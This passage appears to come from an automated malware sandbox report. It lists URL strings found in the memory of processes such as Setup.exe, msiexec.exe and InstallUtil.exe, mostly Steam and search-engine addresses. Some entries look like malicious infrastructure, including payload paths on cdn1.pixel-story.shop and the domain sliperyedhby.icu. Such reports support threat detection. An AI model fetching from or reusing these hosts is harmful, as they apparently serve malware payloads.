          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
          Source: msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb.jpg
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001856000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb.jpghttps://community
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000019D6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.0000000001858000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_medium.jpg
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
          Source: msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001882000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/images/apps/34830/00dc6e6668fdb29311e605ab1
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001882000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/images/apps/34830/5ff93619bfbfc228e2b7f978b
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001882000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/images/apps/34830/98fd6d79ce619a30152b86e08
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001882000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/images/apps/34830/c9e6a4910e1d7e40e62ab3791
          Source: msiexec.exe, 00000005.00000002.1726455860.0000000003595000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1581798119.0000000003594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn1.pixel-story.shop/
          Source: msiexec.exe, 00000005.00000003.1582101958.0000000003568000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1725033822.0000000003570000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1726455860.0000000003595000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1581798119.0000000003594000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1725033822.000000000352E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn1.pixel-story.shop/clp_pa.32
          Source: msiexec.exe, 00000005.00000003.1582101958.0000000003568000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1725033822.0000000003570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn1.pixel-story.shop/clp_pa.32n
          Source: msiexec.exe, 00000005.00000003.1582101958.0000000003568000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1725033822.0000000003570000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1582519453.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn1.pixel-story.shop/ldr_cp_pa
          Source: msiexec.exe, 00000005.00000003.1582101958.0000000003568000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1725033822.0000000003570000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1582519453.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn1.pixel-story.shop/ldr_cp_pa05c5df6HOMEDRIVE=C:HOMEPATH=
          Source: msiexec.exe, 00000005.00000002.1723397884.0000000002FBA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://cdn1.pixel-story.shop/ldr_cp_paKit/537.36
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1726455860.0000000003595000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1581798119.0000000003594000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1725033822.000000000352E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn1.pixel-story.shop/runcl.bin
          Source: msiexec.exe, 00000005.00000002.1726455860.0000000003595000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1581798119.0000000003594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn1.pixel-story.shop/runcl.binp
          Source: msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=BqN7WqGLHNiU&l
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=1Zpka7DM_TWk&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=1Zpka7DM_TWk&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=qM6wpZLwO_gf&amp
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=qM6wpZLwO_gf&l=e
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=g2Zx7e0yBV_M&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=g2Zx7e0yBV_M&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=ftiDdX_V0QeB&l=englis
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=ftiDdX_V0QeB&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/badges/02_years/steamyears13_54.png
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/badges/13_gamecollector/1_54.png?v=4
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000019D6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.0000000001856000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018BE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001882000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=2idoEWbw
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001882000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=LTFw
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=0IXKH44IpF1u&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=0IXKH44IpF1u&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=1vfyNnvUqkgy&l=engl
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=1vfyNnvUqkgy&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=f9Xv_dG_70Ca&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=f9Xv_dG_70Ca&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=Gr5o1d5GQef0&l=en
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=Gr5o1d5GQef0&l=englis
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=engli
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=akmtVhyxSS8B&l=e
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=akmtVhyxSS8B&l=engli
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=HNbD--FePQTr&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=HNbD--FePQTr&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=HNbD--FePQTr&l=englishhttps
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=ij4Q-MLeHxnJ&l=engl
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=ij4Q-MLeHxnJ&l=english
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=ij4Q-MLeHxnJ&l=englishh
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=2VOT8-1_tx9Q&l=en
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=2VOT8-1_tx9Q&l=englis
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=fK65ckRAjZr-&
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=fK65ckRAjZr-&l=en
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&l=e
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=oaWa21XUbd8h&am
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=oaWa21XUbd8h&l=
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001882000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
          Source: msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shared.fastly.steamstatic.com/store_item_assets/steam/apps/34830/capsule_184x69.jpg?t=172837
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shared.fastly.steamstatic.com/store_item_assets/steam/apps/40100/capsule_184x69.jpg?t=163673
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shared.fastly.steamstatic.com/store_item_assets/steam/apps/47400/capsule_184x69.jpg?t=172917
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
          Source: msiexec.exe, 00000005.00000003.1384867045.000000000358E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sliperyedhby.icu
          Source: msiexec.exe, 00000005.00000003.1409345977.000000000659A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1730423166.000000000659C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sliperyedhby.icu/
          Source: msiexec.exe, 00000005.00000003.1343033504.000000000659B000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1372276141.000000000659B000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1357561390.0000000006598000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1341592315.0000000006598000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sliperyedhby.icu/V1
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcastshttps://store.steampowered.com/privacy_agreement/ht
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/app/34830
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/app/34830https://steamcommunity.com/app/34830game_info_achievements_summa
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/app/40100
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/app/47400
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018E0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/comment/Profile/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/https://steamcommunity.com/workshop/https://steamcommunity.co
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/https://steamcommunity.com/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001818000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000019D6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561198043764602
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561198043764602https://community.fastly.ste
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/https://store.steampowered.com/points/shop/https://store.stea
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001970000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.000000000190C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602/badges
